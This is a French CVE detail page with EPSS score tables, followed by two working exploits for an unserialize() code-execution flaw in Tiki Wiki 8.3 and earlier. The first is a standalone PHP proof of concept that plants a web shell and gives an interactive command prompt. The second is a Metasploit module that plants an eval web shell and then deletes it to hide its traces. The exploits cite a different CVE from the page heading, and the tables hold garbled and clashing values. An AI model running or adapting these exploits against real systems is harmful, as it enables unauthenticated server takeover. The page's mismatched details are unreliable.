CVE-2012-3996 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.32%	–	–
2022-02-27	–	–	1.32%	–	–
2022-04-03	–	–	1.32%	–	–
2022-05-15	–	–	1.32%	–	–
2022-09-18	–	–	1.32%	–	–
2023-03-12	–	–	–	1.5%	–
2023-04-02	–	–	–	1.77%	–
2023-09-17	–	–	–	1.77%	–
2024-02-11	–	–	–	0.36%	–
2024-03-17	–	–	–	0.42%	–
2024-06-02	–	–	–	0.47%	–
2024-06-16	–	–	–	0.47%	–
2024-09-22	–	–	–	3.33%	–
2024-09-29	–	–	–	3.33%	–
2024-10-06	–	–	–	3.33%	–
2024-12-22	–	–	–	2.41%	–
2025-01-19	–	–	–	2.41%	–
2025-03-18	–	–	–	–	17.23%
2025-03-30	–	–	–	–	17.23%
2025-04-08	–	–	–	–	17.23%
2025-04-08	–	–	–	–	17.23,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	45%
2022-02-27	46%
2022-04-03	69%
2022-05-15	7%
2022-09-18	71%
2023-03-12	85%
2023-04-02	86%
2023-09-17	87%
2024-02-11	71%
2024-03-17	74%
2024-06-02	75%
2024-06-16	76%
2024-09-22	92%
2024-09-29	91%
2024-10-06	92%
2024-12-22	9%
2025-01-19	9%
2025-03-18	95%
2025-03-30	94%
2025-04-08	95%
2025-04-08	95%

<?php /* ----------------------------------------------------------------- Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution ----------------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13s[at]gmail[dot]com software link....: http://info.tiki.org/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in different locations: lib/banners/bannerlib.php:28: $views = unserialize($_COOKIE[$cookieName]); lib/banners/bannerlib.php:136: $views = unserialize($_COOKIE[$cookieName]); tiki-print_multi_pages.php:19: $printpages = unserialize(urldecode($_REQUEST['printpages'])); tiki-print_multi_pages.php:24: $printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-print_pages.php:31: $printpages = unserialize(urldecode($_REQUEST["printpages"])); tiki-print_pages.php:32: $printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-send_objects.php:42: $sendpages = unserialize(urldecode($_REQUEST['sendpages'])); tiki-send_objects.php:48: $sendstructures = unserialize(urldecode($_REQUEST['sendstructures'])); tiki-send_objects.php:54: $sendarticles = unserialize(urldecode($_REQUEST['sendarticles'])); The vulnerability is caused due to all these scripts using "unserialize()" with user controlled input. This can lead to execution of arbitrary PHP code passing an ad-hoc Zend Framework serialized object. [-] Full path disclosure at: http://[host]/[path]/admin/include_calendar.php http://[host]/[path]/tiki-rss_error.php http://[host]/[path]/tiki-watershed_service.php [-] Disclosure timeline: [11/01/2012] - Vulnerability discovered [14/01/2012] - Issue reported to security(at)tikiwiki.org [14/01/2012] - New ticket opened: http://dev.tiki.org/item4109 [23/01/2012] - CVE number requested [23/01/2012] - Assigned CVE-2012-0911 [01/05/2012] - Version 8.4 released: http://info.tiki.org/article191-Tiki-Releases-8-4 [04/07/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } function get_path() { global $host, $path; $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n"); return $m[1]; } print "\n+----------------------------------------------------------------------+"; print "\n| Tiki Wiki CMS Groupware <= 8.3 Remote Code Execution Exploit by EgiX |"; print "\n+----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /tiki/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $f_path = get_path(); print "\n[-] Path disclosure: {$f_path}\n"; class Zend_Search_Lucene_Index_FieldInfo { public $name = '<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD])); die; ?>'; } class Zend_Search_Lucene_Storage_Directory_Filesystem { protected $_dirPath = null; public function __construct($path) { $this->_dirPath = $path; } } interface Zend_Pdf_ElementFactory_Interface {} class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface { protected $_docCount = 1; protected $_name = 'foo'; protected $_directory; protected $_fields; protected $_files; public function __construct($directory, $fields) { $this->_directory = $directory; $this->_fields = array($fields); $this->_files = new stdClass; } } class Zend_Pdf_ElementFactory_Proxy { private $_factory; public function __construct(Zend_Pdf_ElementFactory_Interface $factory) { $this->_factory = $factory; } } // http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf $directory = new Zend_Search_Lucene_Storage_Directory_Filesystem($f_path."sh.php\0"); $__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo); $____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory); $payload = urlencode(serialize($____proxy)); $payload = str_replace('%00', '%2500', $payload); $payload = "printpages={$payload}"; $packet = "POST {$path}tiki-print_multi_pages.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (preg_match('/multiprint/', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n"); $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ntiki-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution', 'Description' => %q{ This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. In order to run successfully three conditions must be satisfied (1) display_errors php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php version older than 5.3.4 must be used to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3. }, 'Author' => [ 'EgiX', # Vulnerability discovery and PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0911' ], [ 'BID', '54298' ], [ 'EDB', '19573' ], [ 'URL', 'http://dev.tiki.org/item4109' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 04 2012' )) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"]) ], self.class) end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin client.fs.file.rm(@upload_php) print_good("#{@peer} - #{@upload_php} removed to stay ninja") rescue print_error("#{@peer} - Unable to remove #{f}") end end end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => "#{base}tiki-rss_error.php" ) if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/ print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On." return else tiki_path = $1 print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:" printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:" printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:" printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}" printpages << "s:10:\"%00*%00_fields\";a:1:" printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:" printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { 'uri' => "#{base}tiki-print_multi_pages.php", 'method' => 'POST', 'vars_post' => { 'printpages' => printpages } }) if not res or res.code != 200 print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end print_status("#{@peer} - Executing the payload #{@upload_php}") res = send_request_cgi( { 'method' => 'GET', 'uri' => "#{base + @upload_php}", 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } }) if res print_error("#{@peer} - Payload execution failed: #{res.code}") return end end end